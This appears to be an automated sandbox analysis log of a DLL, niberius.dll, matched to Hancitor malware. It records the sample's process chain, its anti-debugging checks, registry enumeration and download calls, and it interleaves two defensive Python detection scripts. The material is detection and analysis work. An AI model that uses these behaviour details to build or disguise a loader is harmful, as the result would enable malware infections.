Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042E4B7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042057D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00414506
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00406D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00430523
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042DDCA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00409DD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042FE02
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00430E22
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00432E3A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042E6E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042EEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040A71A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0042EFC5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0040BFEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04441E10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04452C68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0445547B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0445243C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04459C81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0444FF50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0445A705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04452848
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04452068
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443F0C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0444F92D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0445A1C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0444B1F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0445BB0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04451B95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BB1E10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BC9C81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BC243C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BC547B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BC2C68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BCA705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BBFF50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BAF0C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BC2068
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BC2848
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BBB1F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BCA1C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BBF92D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BC1B95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BCBB0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 02E6FEF0 appears 51 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0444FEF0 appears 51 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 04BBFEF0 appears 51 times
Source: niberius.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winDLL@19/2@11/5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,closesocket,
Source: C:\Windows\SysWOW64\svchost.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
Source: niberius.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
Source: niberius.dll Virustotal: Detection: 9%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\niberius.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,More
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,More
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
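The "Process created" lines above record the chain that matters for detection: rundll32.exe loads a DLL from the user's Desktop and then spawns svchost.exe, a process that on a clean host is started by services.exe with a -k <service group> argument, never by rundll32.exe and never with an empty command line. The following is an added example, not code from the report, that applies those two checks (plus a rundll32-from-user-writable-path check) to process-creation events. The events are constructed to mirror the report's command lines; the Sysmon-style field names and the explorer.exe parent given to loaddll32.exe are assumptions, since the report lists that parent as unknown.

```python
"""
Flag the process chain recorded in the report's "Process created" lines:
loaddll32.exe -> rundll32.exe (DLL from the user's Desktop) -> svchost.exe
spawned by rundll32.exe with no service-group arguments.

Added example, not part of the sandbox report. EVENTS is constructed; the
field names (Image, ParentImage, CommandLine) follow Sysmon event 1 and are
an assumption, as is the explorer.exe parent of loaddll32.exe.
"""
import re
from pathlib import PureWindowsPath

# User-writable locations from which rundll32.exe should not be loading a DLL.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
# svchost.exe is normally started by services.exe with "-k <service group>".
SVCHOST_PARENT = "services.exe"
SVCHOST_ARGS_RE = re.compile(r"\s-k\s+\S+", re.IGNORECASE)
# First "<drive>:\...\<name>.dll" argument on a rundll32 command line.
DLL_RE = re.compile(r"([a-z]:\\[^,'\"]+\.dll)", re.IGNORECASE)

EVENTS = [  # constructed after the report's process tree
    {"Image": r"C:\Windows\System32\loaddll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",   # assumed; the report says "unknown"
     "CommandLine": r"loaddll32.exe 'C:\Users\user\Desktop\niberius.dll'"},
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\loaddll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound"},
    {"Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",   # benign control case
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def check_event(ev: dict) -> list:
    """Return the names of the rules a process-creation event triggers (empty if none)."""
    hits = []
    image = image_name(ev["Image"])
    parent = image_name(ev["ParentImage"])
    cmd = ev["CommandLine"]
    if image == "svchost.exe":
        if parent != SVCHOST_PARENT:
            hits.append("svchost_unexpected_parent")
        if not SVCHOST_ARGS_RE.search(cmd):
            hits.append("svchost_without_service_group")
    if image == "rundll32.exe":
        m = DLL_RE.search(cmd)
        if m and any(part in m.group(1).lower() for part in USER_WRITABLE):
            hits.append("rundll32_dll_from_user_path")
    return hits


def scan(events: list) -> list:
    """Return (image, parent, hits) for every event that triggers at least one rule."""
    results = []
    for ev in events:
        hits = check_event(ev)
        if hits:
            results.append((image_name(ev["Image"]), image_name(ev["ParentImage"]), hits))
    return results


if __name__ == "__main__":
    for image, parent, hits in scan(EVENTS):
        print(f"{parent} -> {image}: {', '.join(hits)}")
```

The parent check alone is what catches this sample's injection target, since the svchost.exe it starts is the one in SysWOW64 with an otherwise plausible path; the missing -k argument is the second, independent signal, so the rule still fires if an operator later parents the process differently.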
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: niberius.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: niberius.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: niberius.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: niberius.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: niberius.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: niberius.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: niberius.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.488380273.0000000002E7D000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.488557122.000000000445D000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.488753613.0000000004BCD000.00000002.00020000.sdmp, niberius.dll
Source: niberius.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: niberius.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: niberius.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: niberius.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: niberius.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E53580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
Source: niberius.dll Static PE information: real checksum: 0x51bd7 should be: 0x508c3
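The checksum line above (stored 0x51bd7, expected 0x508c3) is a cheap static indicator that a file was modified or rebuilt after its header was written, which is typical of packed or patched loaders. The following is an added example, not code from the report or from the sample, that recomputes the header checksum with the algorithm imagehlp's CheckSumMappedFile uses: a ones'-complement sum of the file as little-endian dwords, with the CheckSum field itself excluded, folded to 16 bits and then added to the file length. The sample is not available here, so the test input is a constructed buffer carrying just the PE structure the offsets need; treating a trailing partial dword as zero-padded is an assumption of this implementation.

```python
"""
Recompute a PE image's header checksum and compare it with the stored value.

Added example, not from the report. Implements the CheckSumMappedFile
algorithm (ones'-complement dword sum, CheckSum field skipped, folded to
16 bits, plus file length). build_test_image() produces a constructed
PE-shaped buffer because the analysed sample is not available.
"""
import struct


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum:
    e_lfanew + 4 (PE signature) + 20 (IMAGE_FILE_HEADER) + 64 (offset within the optional header)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    return e_lfanew + 4 + 20 + 64


def compute_pe_checksum(data: bytes) -> int:
    """Checksum the loader would expect for this file content."""
    skip = checksum_field_offset(data)          # dword-aligned in any well-formed PE
    padded = data + b"\0" * (-len(data) % 4)    # assumption: trailing partial dword is zero-padded
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:                         # the CheckSum field is excluded from the sum
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)           # fold to 16 bits
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def verify_checksum(data: bytes) -> dict:
    """Compare stored and computed values; a zero stored value means the linker never set it."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = compute_pe_checksum(data)
    if stored == 0:
        status = "unset"
    elif stored == computed:
        status = "ok"
    else:
        status = "mismatch"
    return {"stored": stored, "computed": computed, "status": status}


def build_test_image(stored_checksum: int, size: int = 256) -> bytes:
    """Constructed PE-shaped buffer: MZ header, e_lfanew = 0x40, PE signature, all else zero."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, checksum_field_offset(bytes(buf)), stored_checksum)
    return bytes(buf)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_image(0x51BD7)
    print(verify_checksum(data))
```

Windows only enforces the checksum for kernel-mode drivers and a handful of boot-time system DLLs, so a mismatch on a user-mode DLL is a triage hint rather than a verdict: plenty of legitimate third-party binaries ship with a zero or stale value. It becomes interesting in combination with the other static findings above (the unrelated design.pdb path, the duplicated IMAGE_DIRECTORY_ENTRY_DEBUG entries).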
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5CB68 push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E6B8E9 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5E8BF push esp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E7C024 push ds; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5D829 push ebp; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5E006 push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5A964 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E6FF35 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5CCC8 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E5A55A push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E8F2CF push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E8D5E0 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E8D561 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E90903 push ecx; retf
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00435E20 push dword ptr [eax+04h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443CCC8 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443A55A push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0444FF35 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443E006 push ds; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0445C024 push ds; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443D829 push ebp; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0444B8E9 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443E8BF push esp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443A964 push edi; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0443CB68 push ebp; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0446F2CF push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0446D561 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04470903 push ecx; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0446D5E0 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BACCC8 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BAA55A push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E53400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E69B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E53580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E8E556 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E8E8AD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E8E08C push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02E8E485 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0446E556 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0446E485 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0446E08C push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BDE556 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BDE08C push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_04BDE485 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E51390 GetProcessHeap,HeapAlloc,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E69B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E6E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E7368A __decode_pointer,SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E73668 SetUnhandledExceptionFilter,__encode_pointer,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040115C SetUnhandledExceptionFilter,exit,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00401150 SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004013C9 SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04453668 SetUnhandledExceptionFilter,__encode_pointer,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0445368A __decode_pointer,SetUnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04449B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0444B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04BC368A __decode_pointer,SetUnhandledExceptionFilter,
